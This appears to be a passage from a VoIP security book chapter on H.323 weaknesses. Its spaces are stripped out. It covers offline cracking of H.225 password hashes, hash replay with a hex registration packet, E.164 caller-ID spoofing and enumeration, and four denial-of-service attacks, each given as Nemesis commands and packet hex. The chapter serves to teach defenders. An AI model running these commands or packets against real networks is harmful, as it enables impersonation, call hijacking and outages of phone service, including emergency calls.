Figure3-5.H.225usernameincleartext

H.323PasswordRetrieval

NowthatwehaveretrievedtheusernameoftheH.323endpoint(H.323ID),let'sattempttogetthepassword.TheauthenticationprocessofH.323endpointsusesH.225,asshowninFigure3-2.ThepasswordisASN.1-encoded,alongwiththeusername(H.323ID)andtimestamp(createdfromthetimeinsecondsfromJanuary1,1970),tocreateanASN.1-encodedbuffer.TheASN.1-encodedbufferisthenusedtocreateanMD5hash(labeledascryptoEPPwdHash).Asmentionedpreviously,thismodelensuresthatthepasswordisnotsentoverthenetworkincleartext;however,themodelisnotimmunetobasicofflinebrute-forceattacks.ThefollowingequationisusedtocreatetheMD5passwordusedastheauthenticatingentitybytheendpoint:

MD5(ASN.1Encoded:H.323ID+Password+timestamp)=Hash

Thismethodisvulnerabletoanofflinedictionaryattack.Anattackersniffingthenetwork,usingaman-in-the-middleattack,cancapturetwoofthethreeitemsrequiredtobrute-forcethepasswordoffline.Furthermore,becauseH.323endpointsoftenusebasicpasswords,suchasthefour-digitextensionofthehardphoneorsoftphone,thetimerequiredtogainthepasswordisminimal.

Inordertoperformanofflinedictionaryattack,theattackerneedstosnifftheusername,timestamp,andresultingMD5hashfromthenetwork,whichallgooverthenetworkincleartext.NoteinFigure3-6thattheH.323-IDrowhastheusername(USER),thetimestamprowhasthetimestampNov7,200610:32:45.00000000,andthehashrowhastheresultingMD5hash:1C8451595D9AC7B983350D268DB7F36E.

Figure3-6.PacketcaptureofH.323authenticationpacket

Atthispoint,anattackercantakeadictionarylistofpasswordsandinserteachoneintotheequationalongwithalltheotheritemsthathavebeencaptured:

MD5(ASN.1-encoded:H.323-ID+password+timestamp)=hash

Forthebrute-forceattack,theattackertakesapasswordfromthedictionaryfile,alongwiththeusername(H.323ID),timestamp,andthenASN.1encodeseachvalueindividually.TheASN.1-encodedbufferisthenhashedusingtheMD5hashingfunction.IftheMD5hashthattheattackercreatedwiththetrialpasswordisthesameMD5hashcapturedoverthenetwork,thentheattackerknowsthatshehascorrectlyguessedthepassword.IftheMD5hashisnotcorrect,theattackerinsertsasecondpasswordintotheequation,generatesanewhash,andrepeatstheprocessuntilshecreatesahashthatmatchesthehashcapturedoverthenetwork.Wecanalsolookattheprocesswithasimpleequation,suchas5+x=8.Peoplecanbrute-forcenumbersinplaceofxuntiltheyreceivethecorrectanswer.Theattacker

canstartwith1,whichisnotcorrectbecauseitequals6;then2,whichisnotcorrectbecausetheansweris7;andthen3,whichiscorrectbecausetheansweris8.Theattackerhasdeterminedthroughbruteforcethatx=3.Unlikeanonlinebrute-forceattack,wheretheattackermayhaveonlylimitedattemptsbeforeheislockedoutornoticedonthenetwork,theattackercanperformthistestindefinitely(offlineonhisownPC)untilhehascrackedthepassword.Furthermore,becausemostH.323hardphonesandsoftphonescontaineasy-to-guesspasswords,thisexercisewillprobablynottaketoolong.Forexample,iftheattackerinsertstheknownvaluesthatweresniffedfromthenetworkinourexampleaboveintothepreviousequation,theonlyunknownisthepassword,asshowninthenewequation:

MD5(ASN.1Encoded:USER+Password+1162895565)=1C8451595D9AC7B983350D268DB7F36E

Theattackercannowattemptpasswordsuntilhereceivesthecorrecthashthatwassniffedoverthenetwork.ThefollowingdemonstrationexploresthispassivedictionaryattackonH.225authentication.Thefirstcolumnshowsthesniffedusername,thesecondcolumnisthevariablethatusesabiglistofdictionarywordsforbrute-forcing(notedinboldtext),thethirdcolumnshowsthesniffedtimestamp,andthefourthcolumnshowstheresultingMD5hashvalue.OncethenewlygeneratedMD5hashvaluematchestheonesniffedoverthenetwork(highlightedinboldinthelastrow),theattackerknowshehasguessedthecorrectpasswordusedbytheH.323endpoint.

Sniffed(Captured)Entitiesoverthenetwork:-Username:USER-Timestamp:1162895565-MD5Hash:1c8451595d9ac7b983350d268db7f36e

MD5(ASN.1Encoded:Username+Password+Timestamp)=HashUSER+test+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+Sonia+1162895565+=!1C8451595D9AC7B983350D268DB7F36E

USER+Raina+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+1108+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+1117+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+isec+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+PASS+1162895565+=1C8451595D9AC7B983350D268DB7F36E

H.323ReplayAttack

H.225authenticationisalsovulnerabletoareplayattack.Areplayattackoccurswhenthesamehash,apasswordequivalentvalue,canbere-sentbyadifferentsourceandauthenticatedsuccessfully.Forexample,ifanentitywasacceptingonlytheMD5hashofpasswordsforauthentication,anattackercouldsimplyreplayanyMD5hashcapturedoverthenetwork,suchasthehashof"iSEC,"andreplayit.Whiletheattackerdoesnotknowwhatthepasswordis,shehasreplayedthepasswordequivalentvalueandbeenauthenticated.Forthisreason,mostMD5hashesaresaltedusingsomerandomvalue.ForH.323,thisisthetimestamp,butusingthetimestamppresentsotherissues.

Note✎

InordertopreventsimpleMD5hashingofeverywordinthedictionary,H.323usesthetimestamp(whichisuniqueforeachauthenticationrequest),username(H.323-ID),andthepasswordtocreatetheMD5hash.Hence,ifthepasswordisiSEC,itwillbecombinedwiththeusernameandcurrenttimestamptocreateauniqueMD5valueforeveryauthenticationattempt.

IftheendpointandgatekeeperusedifferenttimestampsfromtheNTPserver,thehashcreatedbytheH.323endpointwillbeinvalid.Forexample,iftheendpointreceivesatimestampofOct2,20086:34.00andthegatekeeperreceivesatimestampofOct2,20086:34:01,theMD5hasheswillbedifferentandthegatekeeperwillrejecttheauthentication.Asonecanimagine,managingthetimestampfrommultipleNTPdeviceswithhundredsofH.323endpointsand

NTPdeviceswithhundredsofH.323endpointsandgatekeeperscanbecomecumbersomeevenifthetimestampisoffby.01seconds.Therefore,theH.323gatekeepersallowanMD5hashthatwascreatedwithanoldertimestamp(usuallywithin30to60minutes)toauthenticatesuccessfully.Whilethishelpstremendouslyforoperationalpurposes(otherwise,H.323endpointscouldnotconsistentlyauthenticate),itallowsanattackertoperformareplayattack.Eventhoughuniquetimestamps,usernames,andpasswordsareusedtocreatetheMD5hash,theMD5hashisallowedtobereused(replayed)withina30-or60-minuteinterval.It'squitesimpletoperformareplayattack.Themalicioususersimplysniffs(captures)theMD5hashfromtheendpointtothegatekeeperandreplaysthehashvaluebacktothegatekeeper,whichallowstheattacker'sH.323clienttobeauthenticated.Completethefollowingstepstoperformareplayattack:

1. EnsurethattheH.323gatekeeperhasbeenenabledonyourlabnetwork.

2. OpenyourfavoriteH.323endpoint.3. Onasecondmachine(theattacker'smachine),open

Wiresharkfornetworksniffing.4. FromtheH.323endpointonthefirstmachine,connectto

theH.323gatekeeperbyenteringthecorrectusernameandpassword.

5. OncetheH.323endpointisconnectedtoH.323gatekeeper,stopsniffingonWiresharkonthesecondmachine.

6. ScrolldownonWiresharkandselectapacketwiththeProtocollabelofH.225.0andtheInfodescriptionasRAS:RegistrationRequest.

7. Togettheusername,expandtheH.225.0RASentryintheprotocoldetailssectionofWireshark(middlesection)sothatitappearsasfollows:

RASMessage:registrationRequest

registrationRequestcryptoTokensItem0Item:cryptoEPPwdHashcryptoEPPwdHashalias:H.323-IDH323.ID:[USERNAME]

8. TogettheMD5hash,expandH.225.0RASintheprotocoldetailssectionofWireshark(middlesection)sothatitlookslikethis:

RASMessage:registrationRequestregistrationRequestcryptoTokensItem0Item:cryptoEPPwdHashtoken

AvaluelabeledhashundertokenshouldbevisiblewithanMD5valuefollowingit.ThisistheMD5hashvaluethatcanbereplayedbytheattacker.(SeetheMD5hashvalueinFigure3-7.)

Note✎

NoticethetimestampfourrowsabovethisMD5hashvalue.Thisallowstheattackertoknowhowlong(inminutes)theMD5isvalidinordertoperformthereplayattack.

9. Usingapacket-generationtool,suchasNemesisorSnifferPro,createanauthenticationpacketandsendittothegatekeeperofyourchoice.Theeasiestmethodtoperformthisactionistosendanauthenticationrequestfromyour

H.323endpointtoyourgatekeeper.Thisattemptwillberejectedbecauseyoudonothavethecorrectusername(H.323-ID)andpassword;however,itcanbeusedasthetemplateforthenewpacketyouareabouttocreate.

Figure3-7.WiresharkandMD5hashwithanH.225packet

10. OnceyouhavethetemplatefromyourH.225RegistrationRequest,simplyreplacetheincorrectusername(inhex)andtheMD5hashthatwasusedwiththevaluescapturedoverthenetwork(theusernamecapturedfromthenetworkinhexaswellastheMD5hashtobereplayed).

11. Oncetheoldusername/MD5hashisreplacedwiththenewvaluescapturedfromthenetwork,sendthatpacket.Thiswillallowtherequesttobesuccessfullyloggedintothegatekeeperusingareplayattack.

ThefollowinghexinformationisanexampleofafullH.225registrationrequestpacket.TheboldinformationonthefirstlineisthetargetedIPaddressofthegatekeeper(c0a87479is192.168.116.28inhex).Theseconditeminboldistheusernameinhexcapturedbythesniffedsession(00550053

004500520000isUSERinhex).Finally,thelastiteminboldisthecapturedMD5hashfortheH.225registrationrequestpacket.

Note✎

Itemsinitalicareuniquetomylabenvironment;theseitemswillbedifferentinyourownlabenvironment.

0e8008be060008914a0005800100c0a8-IPaddress744906b80100c0a8744906b722c08201010007000000000000000001343900000000000000000000000000000002400c0044004900470053002d0069005300450043002d007400730074050049835869c376820101000754616e64626572670134392c2b10302e010404005500530045-UserName(e.gUSER)00520000c04550d14c082a864886f70d02050080801c8451595d9ac7b983350d-MD5Hash268db7f36e01000100010001000518010000126d015020df8903596f45199f2773c0a59274af00005020df8903596f45199f2773c0a59274af00463c617373656e743e3c617373656e745f747970653e636c69656e743c2f617373656e745f747970653e3c76657273696f6e3e313c2f76657273696f6e3e3c2f617373656e743e

OncethenewH.225registrationrequestpackethasbeencreatedandsentwiththesniffedMD5hash,theattackerwillhavesuccessfullyauthenticatedusingareplayattack.

H.323EndpointSpoofing(E.164Alias)

Atahighlevel,anE.164aliasisthephonenumberplanusedforaddressesandphonenumberaliasesforH.323endpoints.ItisalsooftenusedasanidentifierforH.323endpointsonthenetwork.BecausetheE.164aliasisspoofable,anygatekeeperthatusesitasatrustedvaluecanbesubverted.Generally,anyitemthat

istrustedasanidentificationentityandisalsospoofablebecomesabigsecurityproblemfortheenterprise.E.164aliasspoofingissimilartootherattacksontrustedentities,likeMACaddressesonEthernetcards,InitiatorNodeNamesoniSCSIendpoints,andWWNsonFibreChannelHBAs.IfMACaddressfilteringisbeingusedonawirelessaccesspoint,anyattackercanchangeherMACaddressusingetherchangefromhttp://www.ntsecurity.nu/andbypasstheaccesscontrols.ThesameideaholdstrueforanE.164alias.AmaliciousendpointcanchangeitsE.164aliasandregistertothegatekeeperwithaspoofedidentity.Dependingonthegatekeeper'spolicy,theattackermayormaynotneedtoperformaDoSattackagainsttheentitybeingimpersonatedbeforehand(describedlaterinthischapter)tocompletetheattack.Ifthegatekeeper'spolicyissettooverwrite,everynewendpointwithanE.164aliasalreadyinthegatekeeper'sdatabase(duplicatealias)willbeallowedtooverwritetheexistingregistration;hence,noDoSattackisneeded.Ifthepolicyissettoreject,anynewendpointwithaduplicateE.164aliaswillberejectedandthusnotallowedtojointhenetwork.Inordertojointhenetworkwiththespoofedalias,theattackerwillneedtoperformaDoSattackonthelegitimateendpointinordertoforceitintoanun-registeredstatewiththenetwork.OnceaDenialofServiceattackisperformedonthelegitimateendpointanditisforcedofftheVoIPnetwork,theattackercansliprightinwithhisspoofedalias.Furthermore,whentherealendpointattemptstore-registeronthenetwork,itwillprobablyberejectedbecausethereisalreadyanendpointwithitsE.164alias(theattacker'sendpointthatslippedin).Variouspolicieswillaffecttheoutcomeforthisattackclass.BeforetheattackerspoofsandregistersanotheridentityontheVoIPnetwork,heneedstofindtheE.164aliasasdemonstratedinthefollowingsection.Additionally,becausetheE.164aliasis

thevalueusedtocontactanotherperson,itispublicizedheavilyinVoIPenvironments(similartoaphonenumberinaphonebook).Thecompanydirectorywillhaveauser'sfullnameandhisorherE.164alias(oftenVoIPcompanydirectoriesarefullyavailablewithnoauthentication).ThisinformationcanbeusedbytheattackertospoofpracticallyanyuserontheVoIPnetwork.

Note✎

Oneexampleattackthatisfairlyseverewouldbetoappearasacompanyexecutive,liketheCEOorCFO,andreceiveormakephonecallsasthatperson.IfthereisaconferencecallwiththeSecuritiesandExchangeCommission(SEC),theattackerwillberecognizedastheCEO/CFOandcanrecordaudioclipsoftheconversation(asdescribedinChapter4).

InordertospoofyourE.164alias,completethefollowingsimplesteps.Inthisexample,wewillbeusingthePowerPlayH.323endpoint.

1. SelectStart►Programs►PowerPlay►PowerPlayControlPanel.2. SelecttheGatekeepertab.3. Notethetextboxatthebottomofthescreendisplayingthe

currentE.164alias.Changethecurrentvaluetothenewvalueyouwishtospoof,asshowninFigure3-8.(ThiscanbeanyvaluefromtheVoIPcompanydirectory,suchasthealiasoftheCEOofthecompany.)We'lluse37331.

Figure3-8.SpoofingE.164alias

4. ClickOKandyou'redone!TheE.164aliashasbeenspoofedandisnowrecognizedasanewidentityontheVoIPnetwork.Allcallsdirectedto37331willnowberedirectedtotheattacker'sendpoint.

Note✎

AnattackerwhowishestospoofanaliasthatalreadybelongstoanotherendpointwillhavetoperformaDenialofServiceattackbeforestep3ontherealH.323endpointbeforechangingherE.164alias.

E.164AliasEnumeration

ThereareafewwaystoenumerateanE.164alias,whichisneededtospoofanH.323endpoint(asshowninthepreviousexample).Theeasiestmethodissimplytosnifftheinformation

overthenetwork.Duringacall,oneendpointwillcallanotherendpointusingitsE.164alias.Thedestinationendpoint'sinformationmovesacrossthenetworkincleartext;thus,anattackercansimplysnifftheconnectionandviewthedestinationE.164alias.IfanattackerissniffingthenetworkusingWireshark,thelocationoftheE.164aliasislocatedonthedialedDigitsline.ThedialedDigitslineshowsthedestinationE.164aliasusedforthevoiceconnection.ThepathtofindthedialedDigitslineonanH.323packetusingWiresharkisshownbelow:

H.225.0RASgatekeeperRequestendpointAliasItem1Item:dialedDigitsdialedDigits

Itmaynotbepossibletosimplyperformaman-in-the-middleattacktosniffthenetwork,therebyforcingtheattackertofindabetterwaytoenumerateE.164information.Thenextmethod,whichisthebetterchoicewhensniffingisnotpossible,istobrute-forcetheinformationfromagatekeeper.WhenanendpointattemptstoregisterwithagatekeeperusinganunauthorizedE.164alias,thegatekeepersendsaSecurityDenialMessage,specifically:securityDenial(11).However,ifanendpointattemptstoregisterwithanE.164aliasthathasalreadybeenregistered,thegatekeeperwillsendaduplicateerrormessage,specifically:duplicateAlias.AduplicateerrorsignalsthattheattemptedE.164informationislegitimateandregisteredtothegatekeeperbutusedbyadifferentH.323endpoint.ThisbehaviorallowsanattackertoenumerateE.164informationfromthegatekeeper.BecauseanattackerwillbetoldwhenhehastheincorrectE.164alias(securityDenial)orcorrectbutalreadyusedE.164alias(duplicateAlias),hecan

sendseveralmillionpacketstothegatekeeperwithadifferentE.164alias(1to999999999)untilhegetsalistofduplicateAliasmessagesfromthegatekeeper.ThislistwillthengivetheattackeralistofvalidE.164numbers,allowinghimtoenumeratepossibleentitiestospoof.Toautomatethisattack,anattackercansimplywriteascripttosendmillionsofregistrationrequestpacketstothegatekeeper,eachwithauniqueE.164alias.OncetheattackerreceivesaduplicateAliaserrormessagefromthegatekeeper,hewillhaveenumeratedavalidE.164alias.Forexample,FiguresFigure3-9andFigure3-10showtheenumerationprocess.Line2(rejectReason)inFigure3-9showsanerrormessagewhenanattackerattemptstoregisterwithanE.164aliasthatisnotauthorized(securityDenial).Line2inFigure3-10showsanerrormessage(rejectReason)whenanattackerattemptstoregisterwithanauthorizedE.164aliasthathasalreadybeenregistered(duplicateAlias).ThedifferenceintheerrormessagestellstheattackerthathissecondattemptwasusingavalidE.164aliasname.

Figure3-9.SecuritydenialerrorwhentryingtoregisterwithanunauthorizedE.164alias

Figure3-10.EnumeratingE.164aliasbytheduplicateAliaserrormessage

E.164HoppingAttacks

Hoppingattacksallowunauthorizeduserstojumpacrosssecuritygroupings,allowingthemtoescapeanykindofisolationthatwasputinplace.Forexample,hoppingattacksallowunauthorizeduserstoaccessauthorizedareas.

Furthermore,theattacksallowunprivilegeduserstoaccessareaswhereonlyprivilegedusersshouldbe.PrevioushoppingattacksarebestknownfromCiscoswitches.AttackerswereabletohopacrossVLANsusingspecificVLANtagsandgainaccesstocertainnetworksthatshouldhaveotherwisebeenlimited.AnE.164hoppingattackisanextensionofthespoofingattacksdescribedpreviously.Often,gatekeeperswilluseE.164aliasesassecurityentities(allowingonlyastaticsetofE.164aliasestoregistertogatekeepersormakespecifictypesofcalls).Hence,E.164aliasesaresetupwithdifferentzonesforH.323endpoints.Forexample,onegroupofaliasesmightbeallowedtocallanywhere,includinginternationallocationsatthemostexpensivetimeofday;anothergroupmightberestrictedtocallingonlydomesticlongdistancenumbers;anothergroupmightbeallowedtocallinternalnumbersonly;andafinalgroupmightbeallowedtocallonly"900"numbers.Asofthiswriting,manycontrolsforoutbounddialingarenotused,aseverynumbercancallanywhere;however,thistrendwillprobablychange.Forexample,intoday'smobileenvironment,manycompanyconversationsthatdiscusssensitiveinformationoccurviathephone.Theassumptionisthateveryonewithaccesstothenumbershouldbeonthecall;however,conferencebridgenumbersareforwardedtothewrongplacemoreoftenthanpeoplethink.Thepre-textingandinformationleakageissuesatHewlett-Packard,motivatingthecompanytobreakthelawin2006(althoughwithvirtuallynoconsequences),ledtotheneedforstrongersecurityforsensitiveconferencecalls(http://en.wikipedia.org/wiki/2006_HP_spying_scandal/).Forexample,conferencecallsdiscussingacompany'sgoalswillneedamethodtoensurethatonlyinternalphonenumberscanjointhecall.IfthetechniqueusedtoidentifyauthorizedphonesistheE.164alias,thealiascanbespoofed.Anycontrolssetupbythegatekeeper/gatewayfordialingrestrictionscansimplybeoverriddenbyanattacker.

SpoofingtheE.l64aliasbreakstheentiremodelforidentityassuranceontheH.323VoIPnetwork.Furthermore,asanenduser,callingtheCEO,CFO,orsimplyyourco-workeronanotherfloormayresultinyourspeakingtoanattackerwhohashijackedanidentity.

DenialofServiceviaNTP

Nowthatweknowwhyauthentication(registration)andauthorizationcannotbetrustedwithH.323,let'sshiftfocustotheDenialofServiceattacksonH.323environments.

DoSwithAuthenticationEnabled

ThefirstDoSwewilldiscussoccurswhenauthenticationisenabledforH.323endpoints.Asdiscussedpreviously,H.323authenticationusesatimestampfromanNTPserver(andafewotheritems)tocreatetheMD5hash.However,anattackercanensurethatH.323endpointscannotregistertothenetworkbyupdatingH.323deviceswithincorrecttimestampinformation.ThisispossiblebecauseNTPusesUDPfortransport,whichisconnectionlessandunreliable(hence,anyattackercanforgeanNTPpacket).Forexample,anattackercouldusearogueNTPserverandsendtimestampstoH.323endpointsthatarenotthesametimestampsusedbythegatekeeper.Furthermore,theattackercouldsendtimestampstothegatekeeperthatdifferfromtheonesusedbyalltheendpoints.BecausemostH.323endpointsandgatekeepersdonotrequireauthenticationfortimestampupdates,theywillsimplyacceptthetimestampsreceivedfromtheattacker.Atbest,someendpointsandgatekeeperswillaccepttimestampinformationonlyfromcertainIPaddresses;however,attackerscansimplyspooftheirIPaddressesandthensendthemalicioustimestampinformationtotheendpoint.Hence,withincorrecttimestampinformation,theMD5hashvaluesbetweengatekeepersandH.323endpointswillnotmatch,preventing

gatekeepersandH.323endpointswillnotmatch,preventingVoIPphonefromauthenticating.

Note✎

ApowerfulattackwouldnotneedtotargeteveryH.323endpointonthenetwork,butonlythefourorfivegatekeepers.Oncethegatekeepersareupdatedwithincorrecttimestampinformation,thegatekeeperwillun-registerorrefusetoauthenticateeveryH.323endpointonthenetwork,bringingthewholeVoIPnetworktoitsknees.

UsethefollowingstepstoexecuteaDoSattackonH.323endpointswithauthenticationenabled.

1. Let'suseNemesisforpacketgeneration,whichcanbefoundathttp://www.packetfactory.net/projects/nemesis/orthebootableBackTrackLiveCD(http://www.remote-exploit.org/index.php/BackTrack/).

2. StartNemesisfromtheBackTrackLiveCD.3. DownloadiSEC.NTP.DOSfrom

http://www.isecpartners.com/tools.html/;thisistheinputfilewe'llusewithNemesisinordertoexecutetheNTPDoSattack.

4. Executethefollowingcommandinstepb.Thetestlabinformationbeingusedisshowninstepa,whichshouldbechangedtomatchtheIPaddressesofyourlab:a. Networkinformation

i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323gatekeeper):172.16.1.140iv. Target'sMAC(H.323gatekeeper):02:34:4F:3B:A0:D3

b. Examplesyntax:nemesisudp-x123-y123-S172.16.1.103-D172.16.1.140-H

00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.NTP.DOS

5. RepeatstepbrepeatedlyaslongasyouwanttheDoSattacktooccur(orcreateascripttorepeatitindefinitely).

6. ThefollowinghexinformationshowstheexamplepacketwithaNTPtimestampupdateofNovember7,2006.(Theactualvalueofthetimestampisunimportant;itsimplyneedstobewithinapproximately1,000secondsofthecorrecttime.)BesuretouseahexeditorifyouwishtomodifythefiletobeusedwithNemesis:

dc000afa00000000000102900000000000000000000000000000000000000000c8fb4fb9b6c2699cc8fb4fb9b6c2699c

Done!YouhavenowupdatedtheH.323gatekeeperwiththeincorrecttimestampinformation.AllH.323clientsattemptingtoauthenticatewillberejectedand,hence,preventedfrommakinganytelephonecalls.

DenialofServiceviaUDP(H.225RegistrationReject)

ThenextDenialofServiceattackinvolvesH.225RegistrationRejectpackets.Asthenamesuggests,aRegistrationRejectisusedtorejectregistrationoforun-registeranexistingH.323endpoint.ThesecurityissueisthatnoauthenticationisrequiredtoforciblyrejectH.323endpointsoffthenetwork.Hence,ifanH.323endpointislegitimatelyauthenticatedtoagatekeeper,anattackercansimplysendtheendpointoneUDPRegistrationRejectpacketandtheendpointwillimmediatelybeun-registered.Thelegitimateendpointwillthenattempttore-register,buttheattackercansimplysendanotherUDPpacketandimmediatelyun-registerit.BecausetheattackinvolvesonlyoneUDPpacket,theattackercansendregistrationrejectpacketsonceeveryfewminutesto

preventthelegitimateH.323endpointfromregisteringtothegatekeeper(preventingtheendpointfromsendingorreceivingtelephonecallsindefinitely).CompletethefollowingstepstoexecuteaDoSattackusingRegistrationRejectpackets.

1. StartNemesisfromtheBackTrackLiveCD.2. DownloadiSEC.Registration.Reject.DOSfrom

http://www.isecpartners.com/tools.html/anduseitastheinputfilewithNemesisinordertoexecutetheRegistrationRejectDoS.

3. Oncethefilehasbeendownloaded,executethecommandinstepb.Again,thetestlabinformationbeingusedisshowninstepa;itshouldbechangedtomatchtheIPaddressesofyourlab:a. Networkinformation

i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323endpoint):172.16.1.140iv. Target'sMAC(H.323endpoint):02:34:4F:3B:A0:D3

b. Examplesyntaxnemesisudp-x1719-y1719-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.Registration.Reject.DOS

ThefollowingshowsthehexinformationfromtheprovidedRegistrationRejectpacket.(UseahexeditorifyouwishtomodifythefiletobeusedwithNemesis.)

1400099a060008914a000583010000000000

Done!WithasingleUDPpacket,youhaveun-registeredtheH.323client.

Note✎

InordertoperformthisattackonallH.323clients,simplysendoneUDPpackettoeachIPaddressonthenetwork.ToprolongtheDoSattack,simplysendtheoneUDPpacketrepeatedly,whichwillpreventallH.323clientsfromre-registering.

DenialofServiceviaHostUnreachablePackets

ThenextDenialofServiceattackinvolvesanexistingphonecallbetweentwoH.323endpoints.WhentwoH.323endpointsestablishaphonecall,manypacketsflyacrossthenetwork.Oneofthemanypacketsisusedtoensurethatthetwoendpointsarestillthere.Forexample,whentalkingonyourcellphone,youprobablysay"Hello"whenyouencountersilenceontheotherendtomakesurethatyouhavenotbeendisconnected.Inmanysituations,thepersonmaystillbeonthelinebutsilent,whichmakesyouwonderifthecallhasbeencutoff.ThesameideaappliestoVoIP;packetsaresenttoensurethatthecallisstillconnected.InthisDoSattack,anattackercanrepeatedlyspoofanICMPHostUnreachablepacketfromoneendpointtoanother.Incertainvendorimplementations,thereceiveroftheICMPHostUnreachablepacketwillthinktheothersidehasdisconnectedandwillterminatethecall.

Note✎

AfewH.323hardphoneshavebeentestedandfoundvulnerabletothisattack.Allvendorshavebeennotified,andthisvulnerabilityhasbeenfixed.

ThefollowingstepscanbeusedtoexecuteaDoSattackusingICMPHostUnreachablepacketsduringanexistingcall.

1. StartNemesisfromtheBackTrackLiveCD.2. DownloadiSEC.ICMP.Host.Unreachable.DOSfrom

http://www.isecpartners.com/tools.html/.We'llusethisastheinputfilewithNemesisinordertoexecutetheICMPHostUnreachableDoS.

3. Executethecommandinstepb.Thetestlabinformationbeingusedisshowninstepa;itshouldbechangedtomatchtheIPaddressesofyourlab:a. Networkinformation

i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323endpoint):172.16.1.140iv. Target'sMAC(H.323endpoint):02:34:4F:3B:A0:D3

b. Examplesyntaxnemesisicmp-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-i03-c01-PiSEC.ICMP.Host.Unreachable.DOS

4. Issuethecommandrepeatedlyorcreateascripttorepeatthecommandindefinitely.

ThefollowinghexinformationshowstheexamplepacketwithaRegistrationRejectpacket.(UseahexeditorifyouwishtomodifythisfileforusewithNemesis.)

303035303630303132613139303035303630303165653932303830303435303030303163313233343430303066663031666666326330613837343439633061383734316630333031666366653030303030303030

Done!YouhavenowforciblyterminatedanexistingcallbetweentwoH.323clients.

DenialofServiceviaH.225

nonStandardMessage

OurfinalDenialofServiceattackoccursviatheH.225nonStandardMessagepacket.Asthenamesuggests,anonstandardH.225packetissentfromanendpointtoatargetthatcannotinterpretitcorrectly.Nonstandardmessagesareoftenusedtoperformvendor-specificactions.Incaseswherethepacketsaremisused,themisusemaycauseaVoIPdevicetocrash.Aswiththepreviousattack,anattackercanrepeatedlysendthispackettoaH.323endpointonthenetwork.Dependingonvendorimplementations,thepacketwilloverloadandcrashthesystem.Thiscrash,inturn,opensuptheendpointtomanyoftheattacksdiscussedearlierinthischapter(suchasthereplayattackorendpointspoofing)becauseittakesalegitimateendpointoffthenetworkfortwoorthreeminutes.

Note✎

AfewH.323hardphoneshavebeentestedandfoundvulnerabletothisattack.Allvendorshavebeennotifiedandthisvulnerabilityhasbeenfixed.

ThefollowingstepscanbeusedtoexecutethisDoSattack,whichcausestheremoteendpointtocrash,usingtheH.225nonStandardMessage.

1. StartNemesisfromtheBackTrackLiveCD.2. DownloadiSEC.nonStandardMessage.DOSfrom

http://www.isecpartners.com/tools.html/;thiswillbetheinputfiletobeusedwithNemesisinordertoexecutethenonStandardMessageDoSattack.

3. Oncethefilehasbeendownloaded,executethecommandinstepbwiththelabinformationinstepa:a. Networkinformation

i. Attacker'sIP:172.16.1.103

ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323endpoint):172.16.1.140iv. Target'sMAC(H.323endpoint):02:34:4F:3B:A0:D3

b. Examplesyntaxnemesisudp-x1719-y1719-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.nonStandardMessage.DOS

4. Issuethecommandrepeatedlyorcreateascripttorepeatitindefinitely.

ThefollowingshowsthehexinformationfromtheexamplepacketwithaRegistrationRejectpacket.(UseahexeditorifyouwishtomodifythefiletobeusedwithNemesis.)

5c0981408201010004030000040400000000

Done!YouhavenowcrashedtheH.323client.

SummaryH.323isapopularsignalingprotocolusedinVoIPinfrastructures,especiallyinenterprisenetworkswithexistingPBXsystems.H.323includesseveralsubprotocols,suchasH.235andH.225;however,thesecuritymodelofH.323anditssubprotocolsisquiteweak.AuthenticationandregistrationmethodsusedwithinH.225arevulnerabletoseveralattacks,includingpassivedictionaryattacksandreplayattacks.Aswehaveseen,theauthenticationmodelusedinH.323allowsattackerstoretrieveanendpoint'spasswordquiteeasily.Furthermore,theauthorizationmethodsusedwithH.323relyonE.164aliases,whichcanbespoofedbyanattacker.TheidentityofanyH.323endpointcannotbetrustedbecauseattackerscanperformsimpleattackstoimpersonateothers.Finally,thereliabilityoftheH.323networkleavesmuchtobedesired.ThischapterhasdiscussedonlyfourDenialofServiceattacksagainstH.323endpoints/gatekeepers;however,thereareprobablyalotmore.Voicecommunication,including911calls,requiresahighlevelofreliability/availability.Unfortunately,manyH.323entities,includinghardphonesandsoftphonesandgatekeepers/sessionbordercontrollers,arequiteeasytotakeoffline,cutoff,orsimplyensurethatnocommunicationtakesplace.WhenbuildingaVoIPnetworkusingH.323,itisimportanttoknowaboutthemajorproblemswithauthentication,authorization,andreliability/availability.ThischapterhasfocusedontheflawswithH.323inorderforuserstounderstandtherisks.Chapter9willdiscussthedefensesforVoIPcommunication,includingpossibledefensesagainstH.323attacks.

Chapter4.MEDIA:RTPSECURITYReal-timeTransportProtocol(RTP)isthemajormultimediatransportmethodforSIPandH.323.RealTimeControlProtocol(RTCP)isoftenusedwithRTPasthecomplementaryprotocolthatsendsnondatainformation,suchascontrolinformation,toendpoints.RTCPisprimarilyusedforQoS(QualityofService)information,suchaspacketssent,packetsreceived,andjitter.(JitteristhevariationinthedelayofreceivedpacketsinaVoIPpacketflow.)BothprotocolsareoftenusedtogetherforthemedialayerofVoIPnetworks(mostlyRTPwithsomesupportingRTCPpackets).WhileVoIPcallsaresetupusingH.323orSIP,thevoicecommunication(audio)betweentwoendpointswilluseRTP.Figure4-1showsanexampleofthearchitecture.

Figure4-1.RTPformediacontent

YoushouldunderstandrightawaythatRTPusescleartexttransmission,soitlacksconfidentiality,integrity,andauthentication.UserswhohaveaccesstothenetworkviaasharedmediumorevenviatheuseofanARPpoisoningattack(discussedinChapter2)cansniffRTPpackets,reassemblethem,andthenlistentothevoicecommunicationusingacommonmediaplayer,suchasWindowsMediaPlayer.WhilethesecurityissuesaroundRTPhavebeenknownforsome

